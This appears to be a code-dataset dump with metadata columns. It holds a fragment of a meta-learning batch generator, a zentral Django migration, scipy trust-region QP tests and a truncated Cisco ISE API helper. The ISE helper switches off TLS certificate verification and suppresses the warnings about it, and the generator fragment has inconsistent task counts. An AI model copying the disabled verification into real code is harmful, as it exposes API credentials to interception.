self._task_oracle = task_oracle
self._noise_std = noise_std
assert self._task_oracle == False
if not self._oracle:
if not self._task_oracle:
self.input_size = 1
else:
self.input_size = 2
else:
if not self._task_oracle:
self.input_size = 3
else:
self.input_size = 4
self.output_size = 1
self.num_tasks = 2
def _generate_batch(self):
assert self._meta_batch_size % 5 == 0, 'Error size of meta batch.'
half_batch_size = self._meta_batch_size // 5
sin_inputs, sin_outputs, amp, phase = generate_sinusoid_batch(
amp_range=self._amp_range, phase_range=self._phase_range,
input_range=self._input_range,
num_samples=self._num_total_samples,
batch_size=half_batch_size, oracle=self._oracle)
sin_task_infos = [{'task_id': 0, 'amp': amp[i], 'phase': phase[i]}
for i in range(len(amp))]
lin_inputs, lin_outputs, slope, intersect = generate_linear_batch(
slope_range=self._slope_range,
intersect_range=self._intersect_range,
input_range=self._input_range,
num_samples=self._num_total_samples,
batch_size=half_batch_size, oracle=self._oracle)
lin_task_infos = [{'task_id': 1, 'slope': slope[i], 'intersect': intersect[i]}
for i in range(len(slope))]
qua_inputs, qua_outputs, sign, center, bias = generate_quadratic_batch(
center_range=self._center_range,
bias_range=self._bias_range,
sign_range=self._sign_range,
input_range=self._input_range,
num_samples=self._num_total_samples,
batch_size=half_batch_size, oracle=self._oracle)
qua_task_infos = [{'task_id': 2, 'sign': sign[i], 'center': center[i], 'bias': bias[i]}
for i in range(len(sign))]
tanh_inputs, tanh_outputs, slope, center, bias = generate_tanh_batch(
center_range=self._center_range,
bias_range=self._bias_range,
slope_range=self._slope_range,
input_range=self._input_range,
num_samples=self._num_total_samples,
batch_size=half_batch_size, oracle=self._oracle)
tanh_task_infos = [{'task_id': 3, 'slope': slope[i], 'center': center[i], 'bias': bias[i]}
for i in range(len(sign))]
abs_inputs, abs_outputs, slope, center, bias = generate_abs_batch(
slope_range=self._slope_range,
center_range=self._center_range,
bias_range=self._bias_range,
input_range=self._input_range,
num_samples=self._num_total_samples,
batch_size=half_batch_size, oracle=self._oracle)
abs_task_infos = [{'task_id': 4, 'slope': slope[i], 'center': center[i], 'bias': bias[i]}
for i in range(len(sign))]
inputs = np.concatenate((sin_inputs, lin_inputs, qua_inputs, tanh_inputs, abs_inputs))
outputs = np.concatenate((sin_outputs, lin_outputs, qua_outputs, tanh_outputs, abs_outputs))
if self._noise_std > 0:
outputs = outputs + np.random.normal(scale=self._noise_std, size=outputs.shape)
task_infos = sin_task_infos + lin_task_infos + qua_task_infos + tanh_task_infos + abs_task_infos
return inputs, outputs, task_infos
| 43.572993
| 104
| 0.611065
| 3,068
| 23,878
| 4.40515
| 0.041721
| 0.059267
| 0.032186
| 0.03374
| 0.831225
| 0.79963
| 0.787051
| 0.773289
| 0.748428
| 0.732815
| 0
| 0.020567
| 0.279169
| 23,878
| 547
| 105
| 43.652651
| 0.764641
| 0.003476
| 0
| 0.736052
| 1
| 0
| 0.015345
| 0
| 0
| 0
| 0
| 0
| 0.004292
| 1
| 0.051502
| false
| 0
| 0.006438
| 0
| 0.10515
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
5331b41acb4a9a98948891720c0859072423e0e6
| 2,696
|
py
|
Python
|
zentral/contrib/inventory/migrations/0017_auto_20161212_2356.py
|
arubdesu/zentral
|
ac0fe663f6e1c27f9a9f55a7500a87e6ac7d9190
|
[
"Apache-2.0"
] | 634
|
2015-10-30T00:55:40.000Z
|
2022-03-31T02:59:00.000Z
|
zentral/contrib/inventory/migrations/0017_auto_20161212_2356.py
|
arubdesu/zentral
|
ac0fe663f6e1c27f9a9f55a7500a87e6ac7d9190
|
[
"Apache-2.0"
] | 145
|
2015-11-06T00:17:33.000Z
|
2022-03-16T13:30:31.000Z
|
zentral/contrib/inventory/migrations/0017_auto_20161212_2356.py
|
arubdesu/zentral
|
ac0fe663f6e1c27f9a9f55a7500a87e6ac7d9190
|
[
"Apache-2.0"
] | 103
|
2015-11-07T07:08:49.000Z
|
2022-03-18T17:34:36.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.3 on 2016-12-12 23:56
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('inventory', '0016_auto_20161212_1457'),
]
operations = [
migrations.AlterField(
model_name='businessunit',
name='mt_hash',
field=models.CharField(max_length=40, unique=True),
),
migrations.AlterField(
model_name='certificate',
name='mt_hash',
field=models.CharField(max_length=40, unique=True),
),
migrations.AlterField(
model_name='debpackage',
name='mt_hash',
field=models.CharField(max_length=40, unique=True),
),
migrations.AlterField(
model_name='link',
name='mt_hash',
field=models.CharField(max_length=40, unique=True),
),
migrations.AlterField(
model_name='machine',
name='mt_hash',
field=models.CharField(max_length=40, unique=True),
),
migrations.AlterField(
model_name='machinegroup',
name='mt_hash',
field=models.CharField(max_length=40, unique=True),
),
migrations.AlterField(
model_name='machinesnapshot',
name='mt_hash',
field=models.CharField(max_length=40, unique=True),
),
migrations.AlterField(
model_name='networkinterface',
name='mt_hash',
field=models.CharField(max_length=40, unique=True),
),
migrations.AlterField(
model_name='osversion',
name='mt_hash',
field=models.CharField(max_length=40, unique=True),
),
migrations.AlterField(
model_name='osxapp',
name='mt_hash',
field=models.CharField(max_length=40, unique=True),
),
migrations.AlterField(
model_name='osxappinstance',
name='mt_hash',
field=models.CharField(max_length=40, unique=True),
),
migrations.AlterField(
model_name='source',
name='mt_hash',
field=models.CharField(max_length=40, unique=True),
),
migrations.AlterField(
model_name='systeminfo',
name='mt_hash',
field=models.CharField(max_length=40, unique=True),
),
migrations.AlterField(
model_name='teamviewer',
name='mt_hash',
field=models.CharField(max_length=40, unique=True),
),
]
| 31.348837
| 63
| 0.558605
| 261
| 2,696
| 5.578544
| 0.218391
| 0.192308
| 0.240385
| 0.278846
| 0.749313
| 0.749313
| 0.749313
| 0.749313
| 0.749313
| 0.749313
| 0
| 0.033498
| 0.324555
| 2,696
| 85
| 64
| 31.717647
| 0.766063
| 0.025223
| 0
| 0.717949
| 1
| 0
| 0.103619
| 0.008762
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.025641
| 0
| 0.064103
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
533aff3196a31302de588349daa54251c51b77ba
| 27,931
|
py
|
Python
|
chatbot_env/Lib/site-packages/scipy/optimize/_trustregion_constr/tests/test_qp_subproblem.py
|
rakmakan/Chatbot
|
d04bc1526b56961a16c25148d9ef18c4f157e9c4
|
[
"MIT"
] | 15
|
2020-06-29T08:33:39.000Z
|
2022-02-12T00:28:51.000Z
|
chatbot_env/Lib/site-packages/scipy/optimize/_trustregion_constr/tests/test_qp_subproblem.py
|
rakmakan/Chatbot
|
d04bc1526b56961a16c25148d9ef18c4f157e9c4
|
[
"MIT"
] | 30
|
2020-04-15T19:37:40.000Z
|
2020-04-22T21:19:35.000Z
|
chatbot_env/Lib/site-packages/scipy/optimize/_trustregion_constr/tests/test_qp_subproblem.py
|
rakmakan/Chatbot
|
d04bc1526b56961a16c25148d9ef18c4f157e9c4
|
[
"MIT"
] | 11
|
2020-06-29T08:40:24.000Z
|
2022-02-24T17:39:16.000Z
|
import numpy as np
from scipy.sparse import csc_matrix
from scipy.optimize._trustregion_constr.qp_subproblem \
import (eqp_kktfact,
projected_cg,
box_intersections,
sphere_intersections,
box_sphere_intersections,
modified_dogleg)
from scipy.optimize._trustregion_constr.projections \
import projections
from numpy.testing import (TestCase, assert_array_almost_equal,
assert_array_equal, assert_array_less,
assert_equal, assert_,
run_module_suite, assert_allclose, assert_warns,
dec)
import pytest
class TestEQPDirectFactorization(TestCase):
# From Example 16.2 Nocedal/Wright "Numerical
# Optimization" p.452.
def test_nocedal_example(self):
H = csc_matrix([[6, 2, 1],
[2, 5, 2],
[1, 2, 4]])
A = csc_matrix([[1, 0, 1],
[0, 1, 1]])
c = np.array([-8, -3, -3])
b = -np.array([3, 0])
x, lagrange_multipliers = eqp_kktfact(H, c, A, b)
assert_array_almost_equal(x, [2, -1, 1])
assert_array_almost_equal(lagrange_multipliers, [3, -2])
class TestSphericalBoundariesIntersections(TestCase):
def test_2d_sphere_constraints(self):
# Interior inicial point
ta, tb, intersect = sphere_intersections([0, 0],
[1, 0], 0.5)
assert_array_almost_equal([ta, tb], [0, 0.5])
assert_equal(intersect, True)
# No intersection between line and circle
ta, tb, intersect = sphere_intersections([2, 0],
[0, 1], 1)
assert_equal(intersect, False)
# Outside inicial point pointing toward outside the circle
ta, tb, intersect = sphere_intersections([2, 0],
[1, 0], 1)
assert_equal(intersect, False)
# Outside inicial point pointing toward inside the circle
ta, tb, intersect = sphere_intersections([2, 0],
[-1, 0], 1.5)
assert_array_almost_equal([ta, tb], [0.5, 1])
assert_equal(intersect, True)
# Inicial point on the boundary
ta, tb, intersect = sphere_intersections([2, 0],
[1, 0], 2)
assert_array_almost_equal([ta, tb], [0, 0])
assert_equal(intersect, True)
def test_2d_sphere_constraints_line_intersections(self):
# Interior inicial point
ta, tb, intersect = sphere_intersections([0, 0],
[1, 0], 0.5,
entire_line=True)
assert_array_almost_equal([ta, tb], [-0.5, 0.5])
assert_equal(intersect, True)
# No intersection between line and circle
ta, tb, intersect = sphere_intersections([2, 0],
[0, 1], 1,
entire_line=True)
assert_equal(intersect, False)
# Outside inicial point pointing toward outside the circle
ta, tb, intersect = sphere_intersections([2, 0],
[1, 0], 1,
entire_line=True)
assert_array_almost_equal([ta, tb], [-3, -1])
assert_equal(intersect, True)
# Outside inicial point pointing toward inside the circle
ta, tb, intersect = sphere_intersections([2, 0],
[-1, 0], 1.5,
entire_line=True)
assert_array_almost_equal([ta, tb], [0.5, 3.5])
assert_equal(intersect, True)
# Inicial point on the boundary
ta, tb, intersect = sphere_intersections([2, 0],
[1, 0], 2,
entire_line=True)
assert_array_almost_equal([ta, tb], [-4, 0])
assert_equal(intersect, True)
class TestBoxBoundariesIntersections(TestCase):
def test_2d_box_constraints(self):
# Box constraint in the direction of vector d
ta, tb, intersect = box_intersections([2, 0], [0, 2],
[1, 1], [3, 3])
assert_array_almost_equal([ta, tb], [0.5, 1])
assert_equal(intersect, True)
# Negative direction
ta, tb, intersect = box_intersections([2, 0], [0, 2],
[1, -3], [3, -1])
assert_equal(intersect, False)
# Some constraints are absent (set to +/- inf)
ta, tb, intersect = box_intersections([2, 0], [0, 2],
[-np.inf, 1],
[np.inf, np.inf])
assert_array_almost_equal([ta, tb], [0.5, 1])
assert_equal(intersect, True)
# Intersect on the face of the box
ta, tb, intersect = box_intersections([1, 0], [0, 1],
[1, 1], [3, 3])
assert_array_almost_equal([ta, tb], [1, 1])
assert_equal(intersect, True)
# Interior inicial pointoint
ta, tb, intersect = box_intersections([0, 0], [4, 4],
[-2, -3], [3, 2])
assert_array_almost_equal([ta, tb], [0, 0.5])
assert_equal(intersect, True)
# No intersection between line and box constraints
ta, tb, intersect = box_intersections([2, 0], [0, 2],
[-3, -3], [-1, -1])
assert_equal(intersect, False)
ta, tb, intersect = box_intersections([2, 0], [0, 2],
[-3, 3], [-1, 1])
assert_equal(intersect, False)
ta, tb, intersect = box_intersections([2, 0], [0, 2],
[-3, -np.inf],
[-1, np.inf])
assert_equal(intersect, False)
ta, tb, intersect = box_intersections([0, 0], [1, 100],
[1, 1], [3, 3])
assert_equal(intersect, False)
ta, tb, intersect = box_intersections([0.99, 0], [0, 2],
[1, 1], [3, 3])
assert_equal(intersect, False)
# Inicial point on the boundary
ta, tb, intersect = box_intersections([2, 2], [0, 1],
[-2, -2], [2, 2])
assert_array_almost_equal([ta, tb], [0, 0])
assert_equal(intersect, True)
def test_2d_box_constraints_entire_line(self):
# Box constraint in the direction of vector d
ta, tb, intersect = box_intersections([2, 0], [0, 2],
[1, 1], [3, 3],
entire_line=True)
assert_array_almost_equal([ta, tb], [0.5, 1.5])
assert_equal(intersect, True)
# Negative direction
ta, tb, intersect = box_intersections([2, 0], [0, 2],
[1, -3], [3, -1],
entire_line=True)
assert_array_almost_equal([ta, tb], [-1.5, -0.5])
assert_equal(intersect, True)
# Some constraints are absent (set to +/- inf)
ta, tb, intersect = box_intersections([2, 0], [0, 2],
[-np.inf, 1],
[np.inf, np.inf],
entire_line=True)
assert_array_almost_equal([ta, tb], [0.5, np.inf])
assert_equal(intersect, True)
# Intersect on the face of the box
ta, tb, intersect = box_intersections([1, 0], [0, 1],
[1, 1], [3, 3],
entire_line=True)
assert_array_almost_equal([ta, tb], [1, 3])
assert_equal(intersect, True)
# Interior inicial pointoint
ta, tb, intersect = box_intersections([0, 0], [4, 4],
[-2, -3], [3, 2],
entire_line=True)
assert_array_almost_equal([ta, tb], [-0.5, 0.5])
assert_equal(intersect, True)
# No intersection between line and box constraints
ta, tb, intersect = box_intersections([2, 0], [0, 2],
[-3, -3], [-1, -1],
entire_line=True)
assert_equal(intersect, False)
ta, tb, intersect = box_intersections([2, 0], [0, 2],
[-3, 3], [-1, 1],
entire_line=True)
assert_equal(intersect, False)
ta, tb, intersect = box_intersections([2, 0], [0, 2],
[-3, -np.inf],
[-1, np.inf],
entire_line=True)
assert_equal(intersect, False)
ta, tb, intersect = box_intersections([0, 0], [1, 100],
[1, 1], [3, 3],
entire_line=True)
assert_equal(intersect, False)
ta, tb, intersect = box_intersections([0.99, 0], [0, 2],
[1, 1], [3, 3],
entire_line=True)
assert_equal(intersect, False)
# Inicial point on the boundary
ta, tb, intersect = box_intersections([2, 2], [0, 1],
[-2, -2], [2, 2],
entire_line=True)
assert_array_almost_equal([ta, tb], [-4, 0])
assert_equal(intersect, True)
def test_3d_box_constraints(self):
# Simple case
ta, tb, intersect = box_intersections([1, 1, 0], [0, 0, 1],
[1, 1, 1], [3, 3, 3])
assert_array_almost_equal([ta, tb], [1, 1])
assert_equal(intersect, True)
# Negative direction
ta, tb, intersect = box_intersections([1, 1, 0], [0, 0, -1],
[1, 1, 1], [3, 3, 3])
assert_equal(intersect, False)
# Interior Point
ta, tb, intersect = box_intersections([2, 2, 2], [0, -1, 1],
[1, 1, 1], [3, 3, 3])
assert_array_almost_equal([ta, tb], [0, 1])
assert_equal(intersect, True)
def test_3d_box_constraints_entire_line(self):
# Simple case
ta, tb, intersect = box_intersections([1, 1, 0], [0, 0, 1],
[1, 1, 1], [3, 3, 3],
entire_line=True)
assert_array_almost_equal([ta, tb], [1, 3])
assert_equal(intersect, True)
# Negative direction
ta, tb, intersect = box_intersections([1, 1, 0], [0, 0, -1],
[1, 1, 1], [3, 3, 3],
entire_line=True)
assert_array_almost_equal([ta, tb], [-3, -1])
assert_equal(intersect, True)
# Interior Point
ta, tb, intersect = box_intersections([2, 2, 2], [0, -1, 1],
[1, 1, 1], [3, 3, 3],
entire_line=True)
assert_array_almost_equal([ta, tb], [-1, 1])
assert_equal(intersect, True)
class TestBoxSphereBoundariesIntersections(TestCase):
def test_2d_box_constraints(self):
# Both constraints are active
ta, tb, intersect = box_sphere_intersections([1, 1], [-2, 2],
[-1, -2], [1, 2], 2,
entire_line=False)
assert_array_almost_equal([ta, tb], [0, 0.5])
assert_equal(intersect, True)
# None of the constraints are active
ta, tb, intersect = box_sphere_intersections([1, 1], [-1, 1],
[-1, -3], [1, 3], 10,
entire_line=False)
assert_array_almost_equal([ta, tb], [0, 1])
assert_equal(intersect, True)
# Box Constraints are active
ta, tb, intersect = box_sphere_intersections([1, 1], [-4, 4],
[-1, -3], [1, 3], 10,
entire_line=False)
assert_array_almost_equal([ta, tb], [0, 0.5])
assert_equal(intersect, True)
# Spherical Constraints are active
ta, tb, intersect = box_sphere_intersections([1, 1], [-4, 4],
[-1, -3], [1, 3], 2,
entire_line=False)
assert_array_almost_equal([ta, tb], [0, 0.25])
assert_equal(intersect, True)
# Infeasible problems
ta, tb, intersect = box_sphere_intersections([2, 2], [-4, 4],
[-1, -3], [1, 3], 2,
entire_line=False)
assert_equal(intersect, False)
ta, tb, intersect = box_sphere_intersections([1, 1], [-4, 4],
[2, 4], [2, 4], 2,
entire_line=False)
assert_equal(intersect, False)
def test_2d_box_constraints_entire_line(self):
# Both constraints are active
ta, tb, intersect = box_sphere_intersections([1, 1], [-2, 2],
[-1, -2], [1, 2], 2,
entire_line=True)
assert_array_almost_equal([ta, tb], [0, 0.5])
assert_equal(intersect, True)
# None of the constraints are active
ta, tb, intersect = box_sphere_intersections([1, 1], [-1, 1],
[-1, -3], [1, 3], 10,
entire_line=True)
assert_array_almost_equal([ta, tb], [0, 2])
assert_equal(intersect, True)
# Box Constraints are active
ta, tb, intersect = box_sphere_intersections([1, 1], [-4, 4],
[-1, -3], [1, 3], 10,
entire_line=True)
assert_array_almost_equal([ta, tb], [0, 0.5])
assert_equal(intersect, True)
# Spherical Constraints are active
ta, tb, intersect = box_sphere_intersections([1, 1], [-4, 4],
[-1, -3], [1, 3], 2,
entire_line=True)
assert_array_almost_equal([ta, tb], [0, 0.25])
assert_equal(intersect, True)
# Infeasible problems
ta, tb, intersect = box_sphere_intersections([2, 2], [-4, 4],
[-1, -3], [1, 3], 2,
entire_line=True)
assert_equal(intersect, False)
ta, tb, intersect = box_sphere_intersections([1, 1], [-4, 4],
[2, 4], [2, 4], 2,
entire_line=True)
assert_equal(intersect, False)
class TestModifiedDogleg(TestCase):
def test_cauchypoint_equalsto_newtonpoint(self):
A = np.array([[1, 8]])
b = np.array([-16])
_, _, Y = projections(A)
newton_point = np.array([0.24615385, 1.96923077])
# Newton point inside boundaries
x = modified_dogleg(A, Y, b, 2, [-np.inf, -np.inf], [np.inf, np.inf])
assert_array_almost_equal(x, newton_point)
# Spherical constraint active
x = modified_dogleg(A, Y, b, 1, [-np.inf, -np.inf], [np.inf, np.inf])
assert_array_almost_equal(x, newton_point/np.linalg.norm(newton_point))
# Box Constraints active
x = modified_dogleg(A, Y, b, 2, [-np.inf, -np.inf], [0.1, np.inf])
assert_array_almost_equal(x, (newton_point/newton_point[0]) * 0.1)
def test_3d_example(self):
A = np.array([[1, 8, 1],
[4, 2, 2]])
b = np.array([-16, 2])
Z, LS, Y = projections(A)
newton_point = np.array([-1.37090909, 2.23272727, -0.49090909])
cauchy_point = np.array([0.11165723, 1.73068711, 0.16748585])
origin = np.zeros_like(newton_point)
# newton_point inside boundaries
x = modified_dogleg(A, Y, b, 3, [-np.inf, -np.inf, -np.inf],
[np.inf, np.inf, np.inf])
assert_array_almost_equal(x, newton_point)
# line between cauchy_point and newton_point contains best point
# (spherical constrain is active).
x = modified_dogleg(A, Y, b, 2, [-np.inf, -np.inf, -np.inf],
[np.inf, np.inf, np.inf])
z = cauchy_point
d = newton_point-cauchy_point
t = ((x-z)/(d))
assert_array_almost_equal(t, np.full(3, 0.40807330))
assert_array_almost_equal(np.linalg.norm(x), 2)
# line between cauchy_point and newton_point contains best point
# (box constrain is active).
x = modified_dogleg(A, Y, b, 5, [-1, -np.inf, -np.inf],
[np.inf, np.inf, np.inf])
z = cauchy_point
d = newton_point-cauchy_point
t = ((x-z)/(d))
assert_array_almost_equal(t, np.full(3, 0.7498195))
assert_array_almost_equal(x[0], -1)
# line between origin and cauchy_point contains best point
# (spherical constrain is active).
x = modified_dogleg(A, Y, b, 1, [-np.inf, -np.inf, -np.inf],
[np.inf, np.inf, np.inf])
z = origin
d = cauchy_point
t = ((x-z)/(d))
assert_array_almost_equal(t, np.full(3, 0.573936265))
assert_array_almost_equal(np.linalg.norm(x), 1)
# line between origin and newton_point contains best point
# (box constrain is active).
x = modified_dogleg(A, Y, b, 2, [-np.inf, -np.inf, -np.inf],
[np.inf, 1, np.inf])
z = origin
d = newton_point
t = ((x-z)/(d))
assert_array_almost_equal(t, np.full(3, 0.4478827364))
assert_array_almost_equal(x[1], 1)
class TestProjectCG(TestCase):
# From Example 16.2 Nocedal/Wright "Numerical
# Optimization" p.452.
def test_nocedal_example(self):
H = csc_matrix([[6, 2, 1],
[2, 5, 2],
[1, 2, 4]])
A = csc_matrix([[1, 0, 1],
[0, 1, 1]])
c = np.array([-8, -3, -3])
b = -np.array([3, 0])
Z, _, Y = projections(A)
x, info = projected_cg(H, c, Z, Y, b)
assert_equal(info["stop_cond"], 4)
assert_equal(info["hits_boundary"], False)
assert_array_almost_equal(x, [2, -1, 1])
def test_compare_with_direct_fact(self):
H = csc_matrix([[6, 2, 1, 3],
[2, 5, 2, 4],
[1, 2, 4, 5],
[3, 4, 5, 7]])
A = csc_matrix([[1, 0, 1, 0],
[0, 1, 1, 1]])
c = np.array([-2, -3, -3, 1])
b = -np.array([3, 0])
Z, _, Y = projections(A)
x, info = projected_cg(H, c, Z, Y, b, tol=0)
x_kkt, _ = eqp_kktfact(H, c, A, b)
assert_equal(info["stop_cond"], 1)
assert_equal(info["hits_boundary"], False)
assert_array_almost_equal(x, x_kkt)
def test_trust_region_infeasible(self):
H = csc_matrix([[6, 2, 1, 3],
[2, 5, 2, 4],
[1, 2, 4, 5],
[3, 4, 5, 7]])
A = csc_matrix([[1, 0, 1, 0],
[0, 1, 1, 1]])
c = np.array([-2, -3, -3, 1])
b = -np.array([3, 0])
trust_radius = 1
Z, _, Y = projections(A)
with pytest.raises(ValueError):
projected_cg(H, c, Z, Y, b, trust_radius=trust_radius)
def test_trust_region_barely_feasible(self):
H = csc_matrix([[6, 2, 1, 3],
[2, 5, 2, 4],
[1, 2, 4, 5],
[3, 4, 5, 7]])
A = csc_matrix([[1, 0, 1, 0],
[0, 1, 1, 1]])
c = np.array([-2, -3, -3, 1])
b = -np.array([3, 0])
trust_radius = 2.32379000772445021283
Z, _, Y = projections(A)
x, info = projected_cg(H, c, Z, Y, b,
tol=0,
trust_radius=trust_radius)
assert_equal(info["stop_cond"], 2)
assert_equal(info["hits_boundary"], True)
assert_array_almost_equal(np.linalg.norm(x), trust_radius)
assert_array_almost_equal(x, -Y.dot(b))
def test_hits_boundary(self):
H = csc_matrix([[6, 2, 1, 3],
[2, 5, 2, 4],
[1, 2, 4, 5],
[3, 4, 5, 7]])
A = csc_matrix([[1, 0, 1, 0],
[0, 1, 1, 1]])
c = np.array([-2, -3, -3, 1])
b = -np.array([3, 0])
trust_radius = 3
Z, _, Y = projections(A)
x, info = projected_cg(H, c, Z, Y, b,
tol=0,
trust_radius=trust_radius)
assert_equal(info["stop_cond"], 2)
assert_equal(info["hits_boundary"], True)
assert_array_almost_equal(np.linalg.norm(x), trust_radius)
def test_negative_curvature_unconstrained(self):
H = csc_matrix([[1, 2, 1, 3],
[2, 0, 2, 4],
[1, 2, 0, 2],
[3, 4, 2, 0]])
A = csc_matrix([[1, 0, 1, 0],
[0, 1, 0, 1]])
c = np.array([-2, -3, -3, 1])
b = -np.array([3, 0])
Z, _, Y = projections(A)
with pytest.raises(ValueError):
projected_cg(H, c, Z, Y, b, tol=0)
def test_negative_curvature(self):
H = csc_matrix([[1, 2, 1, 3],
[2, 0, 2, 4],
[1, 2, 0, 2],
[3, 4, 2, 0]])
A = csc_matrix([[1, 0, 1, 0],
[0, 1, 0, 1]])
c = np.array([-2, -3, -3, 1])
b = -np.array([3, 0])
Z, _, Y = projections(A)
trust_radius = 1000
x, info = projected_cg(H, c, Z, Y, b,
tol=0,
trust_radius=trust_radius)
assert_equal(info["stop_cond"], 3)
assert_equal(info["hits_boundary"], True)
assert_array_almost_equal(np.linalg.norm(x), trust_radius)
# The box constraints are inactive at the solution but
# are active during the iterations.
def test_inactive_box_constraints(self):
H = csc_matrix([[6, 2, 1, 3],
[2, 5, 2, 4],
[1, 2, 4, 5],
[3, 4, 5, 7]])
A = csc_matrix([[1, 0, 1, 0],
[0, 1, 1, 1]])
c = np.array([-2, -3, -3, 1])
b = -np.array([3, 0])
Z, _, Y = projections(A)
x, info = projected_cg(H, c, Z, Y, b,
tol=0,
lb=[0.5, -np.inf,
-np.inf, -np.inf],
return_all=True)
x_kkt, _ = eqp_kktfact(H, c, A, b)
assert_equal(info["stop_cond"], 1)
assert_equal(info["hits_boundary"], False)
assert_array_almost_equal(x, x_kkt)
# The box constraints active and the termination is
# by maximum iterations (infeasible iteraction).
def test_active_box_constraints_maximum_iterations_reached(self):
H = csc_matrix([[6, 2, 1, 3],
[2, 5, 2, 4],
[1, 2, 4, 5],
[3, 4, 5, 7]])
A = csc_matrix([[1, 0, 1, 0],
[0, 1, 1, 1]])
c = np.array([-2, -3, -3, 1])
b = -np.array([3, 0])
Z, _, Y = projections(A)
x, info = projected_cg(H, c, Z, Y, b,
tol=0,
lb=[0.8, -np.inf,
-np.inf, -np.inf],
return_all=True)
assert_equal(info["stop_cond"], 1)
assert_equal(info["hits_boundary"], True)
assert_array_almost_equal(A.dot(x), -b)
assert_array_almost_equal(x[0], 0.8)
# The box constraints are active and the termination is
# because it hits boundary (without infeasible iteraction).
def test_active_box_constraints_hits_boundaries(self):
H = csc_matrix([[6, 2, 1, 3],
[2, 5, 2, 4],
[1, 2, 4, 5],
[3, 4, 5, 7]])
A = csc_matrix([[1, 0, 1, 0],
[0, 1, 1, 1]])
c = np.array([-2, -3, -3, 1])
b = -np.array([3, 0])
trust_radius = 3
Z, _, Y = projections(A)
x, info = projected_cg(H, c, Z, Y, b,
tol=0,
ub=[np.inf, np.inf, 1.6, np.inf],
trust_radius=trust_radius,
return_all=True)
assert_equal(info["stop_cond"], 2)
assert_equal(info["hits_boundary"], True)
assert_array_almost_equal(x[2], 1.6)
# The box constraints are active and the termination is
# because it hits boundary (infeasible iteraction).
def test_active_box_constraints_hits_boundaries_infeasible_iter(self):
H = csc_matrix([[6, 2, 1, 3],
[2, 5, 2, 4],
[1, 2, 4, 5],
[3, 4, 5, 7]])
A = csc_matrix([[1, 0, 1, 0],
[0, 1, 1, 1]])
c = np.array([-2, -3, -3, 1])
b = -np.array([3, 0])
trust_radius = 4
Z, _, Y = projections(A)
x, info = projected_cg(H, c, Z, Y, b,
tol=0,
ub=[np.inf, 0.1, np.inf, np.inf],
trust_radius=trust_radius,
return_all=True)
assert_equal(info["stop_cond"], 2)
assert_equal(info["hits_boundary"], True)
assert_array_almost_equal(x[1], 0.1)
# The box constraints are active and the termination is
# because it hits boundary (no infeasible iteraction).
def test_active_box_constraints_negative_curvature(self):
H = csc_matrix([[1, 2, 1, 3],
[2, 0, 2, 4],
[1, 2, 0, 2],
[3, 4, 2, 0]])
A = csc_matrix([[1, 0, 1, 0],
[0, 1, 0, 1]])
c = np.array([-2, -3, -3, 1])
b = -np.array([3, 0])
Z, _, Y = projections(A)
trust_radius = 1000
x, info = projected_cg(H, c, Z, Y, b,
tol=0,
ub=[np.inf, np.inf, 100, np.inf],
trust_radius=trust_radius)
assert_equal(info["stop_cond"], 3)
assert_equal(info["hits_boundary"], True)
assert_array_almost_equal(x[2], 100)
| 42.970769
| 79
| 0.450789
| 3,266
| 27,931
| 3.674525
| 0.060318
| 0.026998
| 0.08216
| 0.106324
| 0.888509
| 0.865845
| 0.852679
| 0.831014
| 0.813099
| 0.789601
| 0
| 0.06955
| 0.422935
| 27,931
| 649
| 80
| 43.03698
| 0.675022
| 0.085675
| 0
| 0.761341
| 0
| 0
| 0.008637
| 0
| 0
| 0
| 0
| 0
| 0.258383
| 1
| 0.045365
| false
| 0
| 0.011834
| 0
| 0.069034
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
533d270e590d1aae1670c3ce49ad1e7f00286ca6
| 12,189
|
py
|
Python
|
local_helpers/utils_endpoint.py
|
monavy/cisco-ise-api-python
|
c1299bf5256abe3a5acbf8c0c7db9c3f3ae7764c
|
[
"MIT"
] | 1
|
2020-05-05T15:39:01.000Z
|
2020-05-05T15:39:01.000Z
|
local_helpers/utils_endpoint.py
|
monavy/cisco-ise-api-python
|
c1299bf5256abe3a5acbf8c0c7db9c3f3ae7764c
|
[
"MIT"
] | null | null | null |
local_helpers/utils_endpoint.py
|
monavy/cisco-ise-api-python
|
c1299bf5256abe3a5acbf8c0c7db9c3f3ae7764c
|
[
"MIT"
] | 1
|
2020-06-28T09:41:46.000Z
|
2020-06-28T09:41:46.000Z
|
import re
import requests
import json
import time
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
def json_pretty_print(json_dict):
"""pretty print json data"""
return json.dumps(json_dict,
indent=2,
sort_keys=True)
def get_endpoint_list(creds,mac_add):
'''get list of endpoints that match criteria'''
#rest_url = creds.get('ise_server') + '/ers/config/endpoint?filter=mac.CONTAINS.' + str(mac_add) + '&size=100&page=1'
rest_url = creds.get('ise_server') + '/ers/config/endpoint?filter=mac.CONTAINS.' + str(mac_add)
headers = {
'content-type': "application/json",
'accept': "application/json",
'cache-control': "no-cache",
}
#r = None
try:
r = None
r = requests.get(url=rest_url, auth=(creds.get('ise_user'), creds.get('ise_pass')), headers=headers, verify=False)
r.close()
r_json = r.json()
if r.status_code == 200 or r.status_code == 201:
#print json_pretty_print(r_json)
return r_json
except Exception, e:
error = e
#print error
if 'Max retries exceeded' in str(error):
time.sleep(.500)
return get_endpoint_list(creds,mac_add)
pass
def get_endpoint(creds,mac_add):
